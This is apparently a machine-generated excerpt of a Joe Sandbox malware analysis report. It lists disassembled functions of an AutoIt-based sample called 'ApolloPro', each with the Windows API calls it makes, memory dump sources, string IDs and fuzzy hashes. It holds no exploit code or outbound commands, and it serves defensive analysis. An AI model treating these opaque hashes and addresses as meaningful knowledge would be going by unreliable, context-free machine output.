                                                                                                • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
                                                                                                • Part of subcall function 0068B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0068B7BD
                                                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00689A2B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_memmove
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 372448540-1403004172
                                                                                              • Opcode ID: 74a3a1307fd68e2998f6c80744eb2df1f39b1e8464a84d28f3b09a47d4a99ff3
                                                                                              • Instruction ID: 82d171a03c1a4721d83847b7f2e3c0fe9ffc6d07dad060a2f21d623c12988d8d
                                                                                              • Opcode Fuzzy Hash: 74a3a1307fd68e2998f6c80744eb2df1f39b1e8464a84d28f3b09a47d4a99ff3
                                                                                              • Instruction Fuzzy Hash: 1601B571A42218AB8B54FBA4CC51CFE776BAF56320B14071DF862573C1DE3458489760
                                                                                              APIs
                                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0063BC07
                                                                                                • Part of subcall function 00641821: _memmove.LIBCMT ref: 0064185B
                                                                                              • _wcscat.LIBCMT ref: 00673593
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: FullNamePath_memmove_wcscat
                                                                                              • String ID: so
                                                                                              • API String ID: 257928180-1026474592
                                                                                              • Opcode ID: 9e2a5497cc15a50111b9c180bfb3bcd8aed1f75a6d2c6d16f1f2d92154bf1acd
                                                                                              • Instruction ID: 2359bd155553f3315c1935007baa479867156268a9c2537d1ad9684b5f0899cb
                                                                                              • Opcode Fuzzy Hash: 9e2a5497cc15a50111b9c180bfb3bcd8aed1f75a6d2c6d16f1f2d92154bf1acd
                                                                                              • Instruction Fuzzy Hash: 6611A53190420CABCB51EBA49841EED77FBFF09350F1010A9BE48DB250DF709B845B95
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fread_nolock_memmove
                                                                                              • String ID: EA06
                                                                                              • API String ID: 1988441806-3962188686
                                                                                              • Opcode ID: 4b6bd0e2d618cccfa761ae41953f02b727652fbc5258caa37609442bac7b7a3d
                                                                                              • Instruction ID: e376473fed6af49c4fa09cefacc8ad654902b57138881b47f0417df142f4b685
                                                                                              • Opcode Fuzzy Hash: 4b6bd0e2d618cccfa761ae41953f02b727652fbc5258caa37609442bac7b7a3d
                                                                                              • Instruction Fuzzy Hash: 1701F972804258BEDF18CAA8C85AEFE7BFC9B05301F00419FF553D25C1E574A6088760
                                                                                              APIs
                                                                                                • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
                                                                                                • Part of subcall function 0068B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0068B7BD
                                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00689923
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_memmove
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 372448540-1403004172
                                                                                              • Opcode ID: b085db943a0e74dae44b00446a8c2ab834f45db280d0638b6424dc56646a7132
                                                                                              • Instruction ID: c8e6dd5ff53a745255223c2fb77580296e599dbe863ff6f56cf93924ad554ae2
                                                                                              • Opcode Fuzzy Hash: b085db943a0e74dae44b00446a8c2ab834f45db280d0638b6424dc56646a7132
                                                                                              • Instruction Fuzzy Hash: 5801A2B2E42208ABCB14FBA0C952EFF77AF9F16340F18021DB84667281DA145E4897B5
                                                                                              APIs
                                                                                                • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
                                                                                                • Part of subcall function 0068B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0068B7BD
                                                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 006899A6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_memmove
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 372448540-1403004172
                                                                                              • Opcode ID: 2fa5498c321a8082428298494438ecf69612bfa06fdb11ad74783e08983fcb14
                                                                                              • Instruction ID: b3835beff5b57fd58a1da72955c632b21ca711286e7d959573094d77fe11ff75
                                                                                              • Opcode Fuzzy Hash: 2fa5498c321a8082428298494438ecf69612bfa06fdb11ad74783e08983fcb14
                                                                                              • Instruction Fuzzy Hash: 8001DB72E4221867CF10FBA4C952EFF77AF9F12340F18021DF84567281DA145E489775
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: __calloc_crt
                                                                                              • String ID: @bo
                                                                                              • API String ID: 3494438863-85795134
                                                                                              • Opcode ID: 62c1e9ab293c79d0b86a15325e4af30939c2e0fc92e1a0f9370f501923fa2091
                                                                                              • Instruction ID: e112c858130b94621502a9fe0c106a607f6eb65daa1c66c2e1d5f8d12435dfd0
                                                                                              • Opcode Fuzzy Hash: 62c1e9ab293c79d0b86a15325e4af30939c2e0fc92e1a0f9370f501923fa2091
                                                                                              • Instruction Fuzzy Hash: B5F03C723082128BF7648F18EC416B167A7FB00761F50296AFA00DB296EB208985D684
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassName_wcscmp
                                                                                              • String ID: #32770
                                                                                              • API String ID: 2292705959-463685578
                                                                                              • Opcode ID: a4c675069e88779948cd36217513f80b8ac094fd7e1d91ee4e34217480d7583d
                                                                                              • Instruction ID: ff31700c13349d660d868273a9102c43e62b6049474bfa4e897a90f5230b9a06
                                                                                              • Opcode Fuzzy Hash: a4c675069e88779948cd36217513f80b8ac094fd7e1d91ee4e34217480d7583d
                                                                                              • Instruction Fuzzy Hash: ECE061325003382BD7109B99AC05FB7F7ADDB04771F001057FD04D3151D5609A0587E0
                                                                                              APIs
                                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 006888A0
                                                                                                • Part of subcall function 00653588: _doexit.LIBCMT ref: 00653592
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message_doexit
                                                                                              • String ID: AutoIt$Error allocating memory.
                                                                                              • API String ID: 1993061046-4017498283
                                                                                              • Opcode ID: af2d22181190a2fef89d4dfe0780de3876d0cad8df52dcb37fde0666c93ca0d2
                                                                                              • Instruction ID: b29e1150d0306b4a3f7b1e6ebbac6b43dc7e18711cc55ed45045dbec97cb1e56
                                                                                              • Opcode Fuzzy Hash: af2d22181190a2fef89d4dfe0780de3876d0cad8df52dcb37fde0666c93ca0d2
                                                                                              • Instruction Fuzzy Hash: F3D02B3138135832D39036E46C0BFDA7A4B8F05B51F00042EFF08A62C34DD1958042E9
                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(?), ref: 00670091
                                                                                                • Part of subcall function 006AC6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,0067027A,?), ref: 006AC6E7
                                                                                                • Part of subcall function 006AC6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 006AC6F9
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00670289
                                                                                              Strings
Memory Dump Source
• Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
• API ID: Library$AddressDirectoryFreeLoadProcSystem
• String ID: WIN_XPe
• API String ID: 582185067-3257408948
APIs
• DestroyIcon.USER32(,zo0zo,006F7A2C,006F7890,?,00645A53,006F7A2C,006F7A30,?,00000004), ref: 00645823
Memory Dump Source
• Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
• API ID: DestroyIcon
• String ID: ,zo0zo$SZd,zo0zo
• API String ID: 1234817797-3609006707